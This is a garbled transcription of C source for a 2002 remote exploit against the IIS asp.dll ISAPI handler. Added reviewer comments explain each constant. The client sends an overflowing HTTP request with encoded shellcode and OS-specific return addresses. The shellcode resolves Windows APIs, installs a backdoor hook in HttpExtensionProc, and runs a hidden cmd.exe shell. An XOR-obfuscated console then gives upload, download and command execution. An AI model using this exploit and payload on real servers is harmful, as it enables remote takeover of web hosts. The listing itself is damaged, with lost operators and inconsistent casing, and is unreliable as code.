#include
#include
#include
#include
#pragma comment (Lib, "WS2_32") /* link Winsock for the client side (WSAStartup/socket/connect/send/recv in main()) */
/*
 * Tuning constants for the IIS asp.dll overflow client whose banner reads
 * "Iis asp.dll overflow program 2.0" (2002).  main() assembles one HTTP
 * request carrying an encoded payload, sends it, and then runs an interactive
 * console over the same TCP connection against the in-process payload
 * (shellcodefn).
 *
 * NOTE(review): this copy is a damaged transcription, not compilable source.
 * Keyword and identifier casing is inconsistent (Void/Char/INT,
 * buffsize/Buffsize/BUFFSIZE, lockbignum2/LockBignum2 -- C is case-sensitive)
 * and many '+', '<' and '\' characters were dropped (e.g. "Buff Offset i"
 * for buff+offset+i, "/ x90" for "\x90").  Read it as documentation of the
 * technique, and do not expect it to build.
 *
 * Practitioner caveats that are visible in the code below:
 *  - operator input is read with gets() into fixed stack buffers;
 *  - the return addresses (EIPEXCEPTWIN2000*, EIPEXCEPTWINNT) are hard-coded
 *    per OS / service pack / locale and chosen by argv[5] ("CN", "SP0",
 *    "MSVCRT", "SP2"); a wrong choice does not "fail safe", it crashes the
 *    target process;
 *  - the "xor" control channel is keyed only by the two constants
 *    lockbignum / LockBignum2 below, so it is obfuscation, not encryption.
 */
// #define reteipaddr Eipwin2000   (left commented out in this version)
#define fnendlong 0x08          /* bytes of fnendstr (a run of 0x90) that memcmp() looks for to find the end of each _asm body */
#define nopcode 0x90            /* x86 NOP; BUFF and shellcodebuff2 are memset() to this before the request is assembled */
#define noplong 0x50            /* only referenced from a commented-out strcpy in main() */
#define buffsize 0x20000        /* 128 KiB; main() keeps four such char arrays on its stack (BUFF, recvbuff, shellcodebuff, shellcodebuff2) = 512 KiB of automatic storage */
#define pathlong 0x12           /* not referenced in this listing */
#define reteipaddress 0x468     /* initial value of OVERADD; main()'s comment lists the alternatives "WinNT 0x2cc or 0x71c Win2000 0x130 OR 0x468". OVERADD is later set to strheadlong-1 and otherwise only used by commented-out code */
#define shellbuffsize 0x800     /* I/O buffer of the in-process payload shellcodefn (chunk size for PeekNamedPipe/ReadFile/ReadClient) */
#define shellfnnums 14          /* not referenced in this listing */
#define database 0x61           /* 'a': main() emits each payload byte as two letters, database+high nibble then database+low nibble ('a'..'p'); shellcodefnlock undoes it (SUB AL,database / SHL AH,4 / ADD AL,AH / STOSB) */
#define dataxorcode 0x55        /* superseded: appears only in commented-out "^= DataXorcode" lines */
#define lockbignum 19999999     /* keystream modulus: state = (state * 0x100) % lockbignum; each byte ^= state % 0x100 (see NewRecv/Newsend) */
#define LockBignum2 13579139    /* keystream seed: state starts at LockBignum2 % lockbignum. Spelled lockbignum2 where it is used -- casing lost in transcription */
#define mcbsize 0x8             /* written into buff7[0] and used as stride divisor (k = (i-j)/(mcbsize*8)) when main() fills the 0xC000-byte follow-up send with 16-byte records; the "mcb" name suggests heap control blocks (inferred) */
#define memsize 0xB200          /* offset at which that record fill begins (j = memsize + 0x10 -- the '+' is missing in this copy); also referenced by the Content-Length comment in main() */
#define shellport 0x1f90 // 0x1f90 = 8080; defined but not referenced in this listing
#define Webport 80              /* default target port when argv[3] is absent or atoi() yields 0 */
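/*
 * Forward declarations.
 *
 * shellcodefn is the payload that runs inside the ISAPI host process: it is
 * handed an EXTENSION_CONTROL_BLOCK pointer and talks back through the
 * WriteClient/ReadClient entries it reads from that block.  shellcodefnlock
 * is the decoder stub that turns the 'a'..'p' nibble encoding back into
 * bytes.  Iisput/Iisget/iiSCMD/IisReset/iiISDIE/Iishelp are the operator
 * commands of the console loop in main() (see Iishelp() for the one-line
 * description of each), and NewRecv/Newsend wrap recv()/send() with the
 * xor keystream.  shellcodefnlock2 and shellcodefn2 are declared but have
 * no definition in this listing.
 *
 * Restored here: the C type keywords (Void/Char/INT are not C) and the ';'
 * that was missing after the Cleanchkesp declaration.  Identifier spelling
 * is left exactly as found even where it disagrees with the definitions
 * further down (IisReset vs Iisreset, iiISDIE vs IISDIE, and the empty
 * parameter lists of IisReset/iiISDIE although callers pass (fd, str)) --
 * that is transcription damage, not intent; an old-style "()" declaration
 * accepts the two arguments without a diagnostic, which is why it went
 * unnoticed.
 */
void shellcodefnlock ();
void shellcodefnlock2 ();
void shellcodefn (char * ecb);
void shellcodefn2 (char * ecb);
void Cleanchkesp (char * Fnadd, char * Shellbuff, char * Chkespadd, int Len);
void Iisput (int FD, char * STR);
void Iisget (int FD, char * STR);
void iiSCMD (int FD, char * STR);
void IisReset ();
void iiISDIE ();
void Iishelp ();
int NewRecv (int FD, char * BUFF, int SIZE, int FLAG);
int Newsend (int FD, char * BUFF, int SIZE, int FLAG);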
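/*
 * Shared state of the obfuscated control channel (client side).
 *
 * xordaBegin -- referenced as XORDATABEGIN in the later code of this copy --
 * is set once the payload's "xordata" marker has been received; from then on
 * NewRecv/Newsend run every byte through the keystream.
 *
 * LOCKINTVAR1 (receive direction) and LOCKINTVAR2 (send direction) hold the
 * keystream state.  Both are seeded with lockbignum2 % lockbignum and stepped
 * once per byte as
 *     state = (state * 0x100) % lockbignum;   byte ^= state % 0x100;
 * Lockcharvar is the scratch byte of that step.  The payload (shellcodefn)
 * keeps its own local copy of the same three variables and runs the same
 * recurrence, which is how the two ends stay in sync; "reset" / Iisreset
 * re-seeds both.  The seed and modulus are fixed constants compiled into
 * the binary, so this hides the traffic from casual inspection only --
 * anyone with this source can decode a captured session.
 *
 * Restored here: the C type keywords (Int/INT/Char are not C).
 */
int xordaBegin;
int LOCKINTVAR1, LOCKINTVAR2;
char Lockcharvar;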
INT main (int Argc, char ** argv)
{
Char * server;
Char * str = "loadLibrarya" "/ x0" "createpipe" "/ x0"
"CreateProcessa" "/ x0" "closehandle" "/ x0"
"Peeknamedpipe" "/ x0"
"Readfile" "/ x0" "Writefile" "/ x0"
"CREATEFILEA" "/ x0"
"Getfilesize" / x0 "
"GetLastError" "/ x0"
"Sleep" "/ x0"
"/X09"" phtdll.dll"""/x0""rtlentercriticalsection""/x0""/x09""sp.dll""/x0""httpextensionproc""/x0"
"/X09""msvcrt.dll""/x0""memcpy""/x0""/x0"
"cmd.exe" "/ x0" "/ x0d / x0a" "it" "/ x0d / x0a" "/ x0"
"Xordata" "/ x0" "xordatareset" "/ x0"
"strend";
// char buff0 [] = "Track / http / 1.1 / nhost:";
Char buff1 [] = "get /";
Char buff2 [] = "default.asp";
Char * buff2add;
Char buff3 [] = "? !! ko";
Char buff4 [] = "http / 1.1 / nhost:";
Char buff5 [] = "/ ncontent-type: Application / X-www-form-urlencoded";
Char buff51 [] = "/ ntransfer-encoding: chunked";
Char buff6 [] = "/ nContent-length: 2147506431 / r / n / r / n"; // 0x80000000 MEMSIZ
E-1
Char buff61 [] = "/ nContent-length: 4294967295 / r / n / r / n"; // 0xffffffff
Char buff7 [] = "/ x10 / x00 / x04 / x05 / x06 / x1c / xf0 / xfd / x7f / x20 / x21 / x0
0 / X01 ";
Char buff11 [] = "/ x02 / x00 / x01 / x02 / x03 / x22 / x22 / x00 / x01 / x22 / x22 / x
00 / X01 ";
Char buff10 [] = "/ x20 / x21 / x00 / x01 / x20 / x21 / x00 / x01";
Char buff9 [] = "/ x20 / x21 / x26 / x27 / x28 / x29 / x2a / x2b / x2c / x2d / x2e / x2f / x30"
Char buff8 [] = "/ x81 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"
/ *
Char buff10 [] = "/ x10 / x00 / x01 / x02 / x03 / x04 / x05 / x06 / x1d / x21 / x00 / x01 / xec / x21 / x0
0 / X01 ";
Char buff11 [] = "/ x10 / x00 / x01 / x02 / x03 / x20 / x21 / x00 / x01 / x01 / x21 / x0
0 / X01 ";
Char buff12 [] = "/ x10 / x00 / x01 / x02 / x06 / x21 / x00 / x00 / x01 / x00 / x21 / x0
0 / X01 ";
CHAR BUFF13 [] = "/ x10 / x00 / x01 / x02 / x03 / x04 / x05 / x06 / x22 / x21 / x00 / x01 / x01";
Char buff14 [] = "/ x10 / x00 / x01 / x02 / x06 / x23 / x21 / x00 / x01 / xe4 / x21 / x0
0 / X01 ";
Char buff15 [] = "/ x10 / x00 / x01 / x02 / x06 / x24 / x21 / x00 / x01 / x90 / x21 / x0
0 / X01 ";
* /
Char * fnendstr = "/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90";
CHAR SRLF [] = "/ x0d / x0a / x00 / x00";
Char * EIPEXCEPTWIN2000ADD;
Char EIPEXCEPTWIN20002 [] = "/ x80 / x70 / x9f / x74"; // push ebx; reset
Address
Char EIPEXCEPTWIN2000CN [] = "/ x73 / x67 / xfa / x7f"; // push ebx; return
Address
Char EIPEXCEPTWIN2000 [] = "/ x80 / x70 / x97 / x74";
// char eipexceptwin2000 [] = "/ xb3 / x9d / xfa / x77"; // / x01 / x78 "; // Cal
l EBX Address
Char EIPEXCEPTWIN2000MSVCRT [] = "/ xd3 / xcb / x01 / x78";
Char EIPEXCEPTWIN2000SP2 [] = "/ x02 / xbc / x01 / x78";
// char energyXceptwin2000 [] = "/ x0b / x08 / x5a / x68";
// char energyxceptwin2000 [] = "/ x32 / x8d / x9f / x74";
Char EIPEXCEPTWINNT [] = "/ x82 / x01 / xfc / x7f"; // push ESI; RET Add
relatives
// char EIPEXCEPTWINNT [] = "/ x2e / x01 / x01 / x78"; // Call ESI AddRE
SS
// char energyPT2 [] = "/ xd0 / xae / xdc / x77"; //
CHAR BUFF [Buffsize];
Char recvbuff [buffsize];
Char shellcodebuff [buffsize];
Char shellcodebuff2 [buffsize];
Struct SockAddr_in S_IN2, S_IN3;
Struct hostent * he;
Char * shellcodefnadd, * chkespadd;
Unsigned int sendpacketlong, buff2long, shelladd, packlong
INT I, J, K, L, STRHEADLONG;
UNSIGNED CHAR TEMP;
Int fd;
U_SHORT Port, Port1, Shellcodeport;
Socket D_IP;
Wsadata wsadata;
INT OFFSET = 0;
INT OVERADD = Reteipaddress;
Int result;
FPRINTF (stderr, "/ n Iis asp.dll overflow program 2.0."); fprintf (stderr, "/ n copy by yuan 2002.4.24.");
FPrintf (stderr, "/ n welcome to my homepage
http://yuange.yeah.net. ");
FPRINTF (stderr, "/ n welcome to
http://www.nsfocus.com. ");
FPRINTF (stderr, "/ n usage:% s
v [0]);
BUFF2ADD = BUFF2;
IF (argc <2) {
FPRINTF (stderr, "/ n please enter the web server:");
Gets (recvbuff);
For (i = 0; i IF (Recvbuff [I]! = ') Break; } Server = Recvbuff; IF (i FPRINTF (stderr, "/ n please enter the .asp filename:"); Gets (shellcodebuff); For (i = 0; i IF (ShellcodeBuff [I]! = ') Break; } Buff2add = shellcodebuff i; Printf ("/ n .asp file name:% s / n", buff2add); } EIPEXCEPTWIN2000ADD = EIPEXCEPTWIN2000; // Printf ("/ n Argc% D Arg V% S", Argc, Argv [5]); IF (argc> 5) { IF (strCMP (Argv [5], "CN") == 0) { EIPEXCEPTWIN2000ADD = EIPEXCEPTWIN2000CN; Printf ("/ n for the cn system./n"); } IF (strCMP (Argv [5], "SP0") == 0) { EIPEXCEPTWIN2000ADD = EIPEXCEPTWIN20002; Printf ("/ n for the sp0 system./N"); } IF (strcmp (Argv [5], "MSVCRT") == 0) { EIPEXCEPTWIN2000ADD = EIPEXCEPTWIN2000MSVCRT; Printf ("/ n use msvcrt.dll jmp to shell./N"); } IF (strCMP (Argv [5], "SP2") == 0) { EIPEXCEPTWIN2000ADD = EIPEXCEPTWIN2000SP2; Printf ("/ n use sp2 msvcrt.dll jmp to shell./N"); } } Result = WSASTARTUP (Makeword (1, 1), & WSADATA); IF (Result! = 0) { FPRINTF (stderr, "Your Computer Was Not Connected" To The Internet At the Time That " "this program was launched, or you" "Do Not Have A 32-bit" "Connection to the Internet."); Exit (1); } / * IF (argc> 4) { OFFSET = ATOI (Argv [4]); } // Overadd = offset; // packlong = 0x10000-offset 0x8; IF (Offset <-0x20 || Offset> 0x20) { FPRINTF (stderr, "/ n offset error! offset -32 - 32."); Gets (buff); Exit (1); } * / IF (argc <2) { // wsacleanup (); // EXIT (1); } Else Server = argv [1]; For (i = 0; i IF (Server [i]! = ') Break; } IF (i For (i = 0; i 3 IF (Server [i] == ':') { IF (Server [i 1] == '//' || Server [i 1] == '/') { IF (Server [i 2] == '//' || Server [i 2] == '/') { Server = i; Server = 3; Break; } } } } For (i = 1; i <= strlen (server); i) { IF (Server [i-1] == '//' || Server [i-1] == '/') Server [i-1] = 0; } D_IP = inet_addr (server); IF (D_IP == - 1) { He = gethostByname (Server); IF (! HE) { WSACLEANUP (); Printf ("/ n can't get the ip of% s! 
/ n", server); Gets (buff); Exit (1); } Else Memcpy (& D_IP, HE-> H_ADDR, 4); } IF (Argc> 3) Port = ATOI (Argv [3]); Else Port = Webport; IF (port == 0) Port = Webport; FD = Socket (AF_INET, SOCK_STREAM, 0); i = 8000; Setsockopt (FD, SOL_SOCKET, SO_RCVTIMEO, (Const Char *) & I, SizeOf (i)); S_IN3.SIN_FAMILY = AF_INET; S_IN3.SIN_PORT = HTONS (Port); S_IN3.SIN_ADDR.S_ADDR = D_IP; Printf ("/ N Nuke IP:% S Port% D", INET_NTOA (S_IN3.SIN_ADDR), HTONS (S_IN3.SIN_ Port)); IF (Connect (FD, (Struct SockAddr *) & S_IN3, SIZEOF (Struct SockAddr_in))! = 0) { CloseSocket (FD); WSACLEANUP (); FPRINTF (stderr, "/ n connect err."); Gets (buff); Exit (1); } _asm { MOV ESI, ESP CMP ESI, ESP } _chkesp (); Chuestspadd = _chkesp; Temp = * chuest; IF (Temp == 0xE9) { chuesthant I = * (int *) Chuestion; Chkespadd = i; Chkespadd = 4; } / * Shellcodefnadd = shellcodefnlock; Temp = * shellcodefnadd; IF (Temp == 0xE9) { shellcodefnadd; K = * (int *) shellcodefnadd; Shellcodefnadd = K; Shellcodefnadd = 4; } For (k = 0; k <= 0x500; k) { IF (MemcMP (Shellcodefnadd K, Fnendstr, Fnendlong) == 0) Break; } * / MEMSET (BUFF, NOPCODE, BUFFSIZE); / * STRCPY (BUFF, BUFF0); IF (Argc> 6) STRCAT (BUFF, Argv [6]); Else Strcat (BUFF, Server); STRCAT (BUFF, "/ R / N / R / N"); // proxy_connection: Keep-alive / r / n "); STRCAT (BUFF, BUFF1); * / STRCPY (BUFF, BUFF1); strheadlong = Strlen (BUFF); Overadd = strheadlong-1; IF (argc> 2) buff2add = argv [2]; For (;; buff2add) { Temp = * buff2add; IF (Temp! = '//' && Temp! 
= '/') Break; } // Printf ("/ NFILE:% S", BUFF2ADD); Buff2long = Strlen (buff2add); STRCAT (BUFF, BUFF2ADD); // fprintf (stderr, "/ n offset:% D / N", OFFSET); // offset = strheadlong-strlen (buff1); / * FOR (i = 0x404; i <= 0x500; i = 8) { Memcpy (buff offset i, "/ x42 / x42 / x42 / x2d", 4); // 0x2d Sub Eax, Num32 Memcpy (Buff Offset i 4, EIPEXCEPTWIN2000ADD, 4); } IF (argc> 5) { IF (strCMP (Argv [5], "SP2") == 0) {MEMCPY (Buff Offset i, "/ X58", 1); } } For (i = 0x220; i <= 0x380; i = 8) { Memcpy (buff offset i, "/ x42 / x42 / x42 / x2d", 4); // 0x2d Sub Eax, Num32 Memcpy (Buff Offset i 4, EIPEXCEPTWINNT, 4); } FOR (i = 0x580; i <= 0x728; i = 8) { Memcpy (buff offset i, "/ x42 / x42 / x42 / x2d", 4); // 0x2d Sub Eax, Num32 Memcpy (Buff Offset i 4, EIPEXCEPTWINNT, 4); } * / // WinNT 0x2cc or 0x71c Win2000 0x130 OR 0x468 // Memcpy (buff offset i 8, exceptret, strlen (exceptret)); Shellcodefnadd = shellcodefnlock; Temp = * shellcodefnadd; IF (Temp == 0xE9) { shellcodefnadd; K = * (int *) shellcodefnadd; Shellcodefnadd = K; Shellcodefnadd = 4; } For (k = 0; k <= 0x500; k) { IF (MemcMP (Shellcodefnadd K, Fnendstr, Fnendlong) == 0) Break; } MEMSET (ShellcodeBuff2, Nopcode, Buffsize); i = 0x1000; Memcpy (shellcodebuff2 i 4, shellcodefnadd k 8, 0x100); Shellcodefnadd = shellcodefn; Temp = * shellcodefnadd; IF (Temp == 0xE9) { shellcodefnadd; K = * (int *) shellcodefnadd; Shellcodefnadd = K; Shellcodefnadd = 4; } FOR (k = 0; k <= buffsize; k) { IF (MemcMP (Shellcodefnadd K, Fnendstr, Fnendlong) == 0) Break; } // k = 0x Memcpy (shellcodeBuff, shellcodefnadd, k); // j); Cleanchkesp (Shellcodefnadd, ShellcodeBuff, ChkespAdd, K); For (j = 0; j <0x400; j) { IF (Memcmp (STR J, "Strend", 6) == 0) Break; } Memcpy (ShellcodeBuff K, STR, J); SendPacketlong = K J; For (k = 0; k <= 0x200; k) { IF (Memcmp (ShellcodeBuff2 i 4 K, Fnendstr, Fnendlong) == 0) Break;} For (j = 0; j Temp = shellcodebuff [j]; // Temp ^ = DataXorcode; ShellcodeBuff2 [i 4 K] = Database TEMP / 0X10; K; 
ShellcodeBuff2 [i 4 K] = Database Temp% 0x10; K; } J = i K; J = J% 8 3; ShellcodeBuff2 [i J K] = 0; // j = strlen (shellcodebuff2)% 8 3; For (j = 0; j <= 0xE000; J = 4) { STRCAT (ShellcodeBuff2, "/ X41 / X41 / X41 / X41"); // 0x2d Sub Eax, Num32 // strcat (shellcodebuff2, energyxceptwin2000cn); } / * STRCAT (ShellcodeBuff2, "/ X90 / X90 / X90 / X90 / X90 / XEB / X0F / X66 / X83 / X6C / X24 / X02 / X01 / X66 / X81 / X2C / X24 / X01 / X01 / XFF / X24 / X24 / XE8 / XEC / XFF / XFF / XFF / X90 ") For (j = 0; j <= 0xb00; j = 4) { STRCAT (ShellcodeBuff2, "x90 / x90 / x90 / x2d"); // 0x2d Sub Eax, Num32 } * / // Printf ("/ NBUFF:% S", BUFF); Printf ("/ N shellcode long 0x% x / n", sendpacketlong); IF (Argc> 4 && Strmp (Argv [4], "Apache") == 0) { STRCAT (BUFF, "); } Else Strcat (buff, buff3); Printf ("/ n packetlong: 0x% x / n", sendpacketlong); STRCAT (BUFF, BUFF4); IF (Argc> 6) STRCAT (BUFF, Argv [6]); Else Strcat (BUFF, Server); STRCAT (BUFF, BUFF5); IF (Argc> 4 && Strcmp (Argv [4], "Apache") == 0) STRCAT (BUFF, "); Else STRCAT (BUFF, ShellcodeBuff2); // strcat (buff, buff51); IF (Argc> 4 && (STRCMP (Argv [4], "WinXP") == 0 || StrCMP (Argv [4], "Apache") == 0) { Printf ("/ n for% s system / n", argv [4]); STRCAT (BUFF, BUFF61); } Else Strcat (buff, buff6); // Printf ("/ N Send Buff: / N% S", BUFF); / * I = Strlen (BUFF); MEMSET (Buff I, 'A', 0xC000); MEMSET (BUFF I 0XC000-Strlen (BUFF7), 0, 1); STRCAT (BUFF I 0XC000-0X10-Strlen (BUFF7), BUFF7); * / // strcpy (buff8, buff7); / * TEMP = BUFF7 [5]; Temp- = offset * 0x10; BUFF7 [5] = TEMP; i = * (int *) (buff7 4) 2; Printf ("/ nseh = 0x% x / n", i); * / / * For (i = 0; i <8; i) { Temp = BUFF7 [I]; Printf ("% 2X", TEMP); } * / / * For (i = 0; i <0xc000 / 0x10; i) { STRCAT (BUFF, BUFF7); } * / // Printf ("/ NBUFF =% S / N", BUFF); // strcat (buff, "/ r / n"); // Printf ("/ N Send Buff: / N% S", BUFF); // STRCPY (Buff Overadd Noplong, Shellcode); Sendpacketlong = Strlen (BUFF); // Printf ("BUFF: / N% S", BUFF 0x10000); / * 
#ifdef debug _asm { LEA ESP, BUFF Add ESP, OVERADD RET } #ENDIF * / Lockintvar1 = lockbignum2% LockBignum; Lockintvar2 = Lockintvar1; XORDATABEGIN = 0; FOR (i = 0; i <1; i) { J = sendpacketlong; // buff [0x2000] = 0; FPRINTF (stderr, "/ n send packet% d bytes.", J); // Gets (buff); Send (FD, BUFF, J, 0); BUFF7 [0] = McBsize; J = MEMSIZE 0X10; i = 0; IF (Argc> 4 && strcmp (Argv [4], "WinXP") == 0) { J = 0x18; i = 8; } For (k = 0; i <0xc000; i = 0x10) { IF (i> = j) { K = ((i-j) / (mcbsize * 8)); IF (k <= 6) { Memcpy (buff7 0x8, buff10, 8); BUFF7 [0x8] = BUFF8 [K]; BUFF7 [0xc] = BUFF9 [K]; } Else Memcpy (buff7, buff11, 0x10); } Memcpy (buff i, buff7, 0x10); } IF (Argc> 4 && Strmp (Argv [4], "Apache") == 0) { For (k = 0xb000; k <= 0xc000; k = 2) { MEMSET (BUFF K, 0x0D, 1); MEMSET (BUFF K 1,0x0a, 1); } BUF [0xC000] = 0; // for (k = 0; k <0x10; K) Send (FD, BUFF, 0XC000, 0); // Printf ("/ NBUFF:% S / N", BUFF); } Else Send (FD, BUFF, 0XC000, 0); K = 0; IOCTLSocket (FD, Fionbio, & K); J = 0; While (j == 0) { K = NewRecv (FD, Recvbuff, Buffsize, 0); IF (k> = 8 && strstr (Recvbuff, "xordata")! = 0) { XORDATABEGIN = 1; FPRINTF (stderr, "/ n ok! RECV% D Bytes / N", K); RECVBUFF [K] = 0; // Printf ("/ N RECV:% S", Recvbuff); // for (k- = 8, j = 0; k> 0; k- = 4, J) Printf ("Recvdata: 0x% x / n", * (int *) (Re) CVBUFF 8 4 * J)))) K = -1; J = 1; } IF (k> 0) { RECVBUFF [K] = 0; FPRINTF (stderr, "/ n recv: / n% s", recvbuff); } } } K = 1; IOCTLSocket (FD, Fionbio, & K); // fprintf (stderr, "/ n now begin: / n"); / * For (i = 0; i SRLF [I] ^ = DataXorcode; } Send (FD, SRLF, STRLEN (SRLF), 0); Send (FD, SRLF, STRLEN (SRLF), 0); Send (FD, SRLF, STRLEN (SRLF), 0); * / K = 1; L = 0; While (k! 
= 0) { IF (k <0) { L = 0; i = 0; While (i == 0) { Gets (buff); IF (Memcmp (BUFF, "IISH", 4) == 0) { Iishelp (); i = 2; } IF (Memcmp (BUFF, "IISPUT", 6) == 0) { IISPUT (FD, BUFF 6); i = 2; } IF (Memcmp (Buff, "Iisget", 6) == 0) { Iisget (FD, BUFF 6); i = 2; } IF (Memcmp (BUFF, "IISCMD", 6) == 0) { IISCMD (FD, BUFF 6); i = 2; } IF (Memcmp (Buff, "Iisreset", 8) == 0) { IisReset (FD, BUFF 6); i = 2; } IF (Memcmp (BUFF, "IISDIE", 6) == 0) { IISDIE (FD, BUFF 6); i = 2; } IF (i == 2) i = 0; ELSE I = 1; } K = Strlen (BUFF); Memcpy (buff K, SRLF, 3); // Send (FD, SRLF, Strlen (SRLF), 0); // fprintf (stderr, "% s", buff); / * For (i = 0; i Lockintvar2 = lockintvar2 * 0x100; Lockintvar2 = lockintvar2% LockBignum; LockCharvar = Lockintvar2% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode; // buff [i] ^ = DataXorcode; } Send (FD, BUFF, K 2, 0); * / Newsend (FD, BUFF, K 2, 0); // Send (FD, SRLF, Strlen (SRLF), 0); } K = NewRecv (FD, BUFF, BUFFSIZE, 0); IF (xordATABEGIN == 0 && K> = 8 && strstr (buff, "xordata")! 
= 0) { XORDATABEGIN = 1; K = -1; } IF (k> 0) { // fprintf (stderr, "rv% D Bytes", K); / * IF (xordATABEGIN == 1) { For (i = 0; i Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; Lockcharvar = lockintvar1% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode; } } * / L = 0; BUFF [K] = 0; FPRINTF (stderr, "% s", buff); } Else { Sleep (20); IF (l <20) k = 1; L; } // IF (k == 0) Break; } CloseSocket (FD); WSACLEANUP (); FPRINTF (stderr, "/ n the server close connect."); Gets (buff); Return (0); } Void shellcodefnlock () { _asm { NOP NOP NOP NOP NOP NOP NOP NOP JMP next1 GetIAdd: Pop Edi MOV ESP, EDI And ESP, 0xffffff0f0 JMP next2 Getshelladd: PUSH 0x01 Mov Eax, EDI INC EAX INC EAX INC EAX INC EAX INC EAX Mov Edi, EAX MOV ESI, EDI // SUB SP, 8 XOR ECX, ECX LOOPLOCK: LODSB CMP AL, CL JZ Shell SUB Al, Database MOV AH, Al Lodsb SUB Al, Database SHL AH, 4 Add Al, AH // Lea Eax, PTR Word [EDX * 4 Al] Stosb JMP LOOPLOCK Next1: Call getediadd Next2: Call getshelladd Shell: NOP NOP NOP NOP NOP NOP NOP NOP } } Void shellcodefn (char * ecb) {Char Buff [shellbuffsize 2]; INT * EXCEPT [3]; FarProc MemcpyAdd; FarProc Msvcrtdlladd; FarProc HTTPEXTENSIONPROCADD; FarProc aspdlladd; FarProc RtlentercriticalSectionAdd; FarProc NTDLLLDD; FarProc SleepAdd; FarProc getlasterroradd; FarProc getFileSizeAdd; FarProc CreatefileaAdd; FarProc WritefileAdd; FarProc ReadfileAdd; FarProc PeeknamedpiPireAdd; FarProc CloseHandD; FarProc CreateProcessAdd; FarProc CreatePipeAdd; FarProc ProcloadLib; FarProc APIFNADD [1]; FarProc ProcgetAdd = 0; FarProc WriteClient; FarProc ReadClient; HCONN CONNID; FarProc shellcodefnadd = ECB; Char * stradd, * stradd2, * dooradd; Int Imgbase, Fnbase, i, k, l, thedoor; Handle Libhandle; INT fpt; // libwsock32; Startupinfo SiINFO; PROCESS_INFORMATION processinformation; Handle Hreadpipe1, hwritepipe1, hreadpipe2, hwritepidipe2; INT LBYTESREAD; INT LOCKINTVAR1, LOCKINTVAR2; Char Lockcharvar; Int shelllocknum; // unsigned char TEMP; Security_attributes 
sa; _asm {JMP nextcall GetStradd: Pop Stradd Lea Edi, Except Mov Eax, DWORD PTR FS: [0] MOV DWORD PTR [EDI 0x08], EAX Mov DWORD PTR FS: [0], EDI } Except [0] = 0xfffffffff; Except [1] = stradd-0x07; IMGBase = 0x77E00000; _asm { Call getExceptretadd } For (; imgbase <0xBFFA0000, ProcgetAdd == 0;) { IMGBase = 0x10000; IF (imgbase == 0x78000000) IMGBase = 0xBff00000; IF (* (Word *) IMGBASE == 'ZM' && * (Word *) (IMGBASE * (INT *) (IMGBase 0x3c)) == 'EP') {fnbase = * (int *) (IMGBASE * (INT *) (IMGBase 0x3c) 0x78) IMGB ASE; K = * (int *) (fnbase 0xc) IMGBASE; IF (* (int *) k == 'NREK' && * (int *) (k 4) == '23LE') { LibHandle = IMGBASE; K = IMGBASE * (INT *) (FNBase 0x20); For (l = 0; l <* (int *) (fnbase 0x18); L, K = 4) { IF (* (INT *) (IMGBase * (int *) k) == 'Pteg' && * (int *) (4 i MGBase * (int *) k) == 'acor') { K = * (Word *) (L L IMGBASE * (INBASE 0x24)); K = * (int *) (fnbase 0x10) -1; K = * (int *) (K K K K IMGBASE * (INT *) (FNBase 0x1c)) ; ProcgetAdd = K IMGBASE; Break; } } } } } // Search Kernel32. DLL module address and API function getProcAddress address / (Note that this is not in the case where the search page is processed. IF (procgetadd == 0) goto die; i = stradd; For (k = 1; * stradd! = 0; k) { IF (* stradd == 0x9) libhandle = procloadLib (stradd 1); Else apifnadd [k] = procgetadd (libhandle, stradd); FOR (; * stradd! = 0; stradd) { } stradd; } stradd; K = 0x7ffdf020; * (int *) k = rtlentercriticalsectionAdd; K = stradd; stradd = i; THEDOOR = 0; i = 0; _asm { JMP getDoorcall GetDooradd: Pop Dooradd; MOV L, ESP Call getExceptretadd } IF (i == 0) { i; IF (* (int *) ECB == 0x90) { IF (* (int *) (* (INT *) (ECB 0x64)) == 'ok !!') { i = 0; THEDOOR = 1; } } } IF (i! 
= 0) { * (int *) (DOORADD-0x0C) = httpextensionprocadd; * (int *) (dooradd-0x13) = shellcodefnadd; ECB = 0; _asm { Call getExceptretadd } i = ECB; I & = 0xffff000; ECB = i; ECB = 0x1000; For (; i IF (* (int *) ECB == 0x90) { IF (* (INT *) == (int *) ECB) { IF (* (int *) (INT *) (ECB 0x64) == 'ok !!') Break; } } } i = 0; _asm { Call getExceptretadd } I & = 0xffff000; i = 0x1000; For (; i IF (* (int *) i == httpextensionprocadd) { * (int *) i = DOORADD-7; // Break; } } // * (INT *) (DOORADD-0X0C) = httpextensionprocadd; } WriteClient = * (int *) (ECB 0x84); Readclient = * (int *) (ECB 0x88); CONNID = * (int *) (ECB 8); STRADD = K; _asm { Lea Edi, Except MOV Eax, DWORD PTR [EDI 0x08] Mov DWORD PTR FS: [0], EAX } IF (thisDoor == 0) { _asm { MOV EAX, 0xfffffffFFFFFF Mov DWORD PTR FS: [0], EAX } } stradd2 = stradd; STRADD = 8; K = 0x20; WriteClient (connid, * (int *) (ECB 0x6C), & k, 0); K = 8; WriteClient (Connid, Stradd 9, & K, 0); // SleepAdd (100); Shelllocknum = LockBignum2; IF (* (int *) * (ECB 0x64) == 'OK !!' 
&& * (int *) (* (int *) (ECB 0x6 4) 4) == 'NOTX') shelllocknum = 0; // iiscmd: Lockintvar1 = shelllocknum% LockBignum; Lockintvar2 = Lockintvar1; IISCMD: / * Lockintvar1 = lockbignum2% LockBignum; Lockintvar2 = Lockintvar1; * / Sa.nlength = 12; Sa.lpsecurityDescriptor = 0; Sa.binherithandle = true; CreatePipeadd (& Hreadpipe1, & HwritePipe1, & Sa, 0); CreatePipeadd (& Hreadpipe2, & HwritePipe2, & Sa, 0); // ZeromeMory (& SiInfo, SIZEOF (SIINFO); _asm { Lea Edi, SIINFO XOR EAX, EAX MOV ECX, 0x11 RepNZ Stosd } Siinfo.dwflags = startf_useshowwindow | Startf_usestdhandles; SiINFO.WSHOWINDOW = SW_HIDE; SiINFO.HSTDINPUT = HREADPIPE2; SIINFO.HSTDOUTPUT = HWRITEPIPE1; SiINFO.HSTDERROR = hwritepidipe1; K = 0; // while (k == 0) // { K = CreateProcessAdd (Null, Stradd2, Null, Null, 1,0, Null, Null, & SiINFO, & PRO CESSINFORMATION); // stradd = 8; //} SleepAdd (200); // peeknamedpipeadd (Hreadpipe1, buff, shellbuffsize, & lbytesread, 0, 0); i = 0; 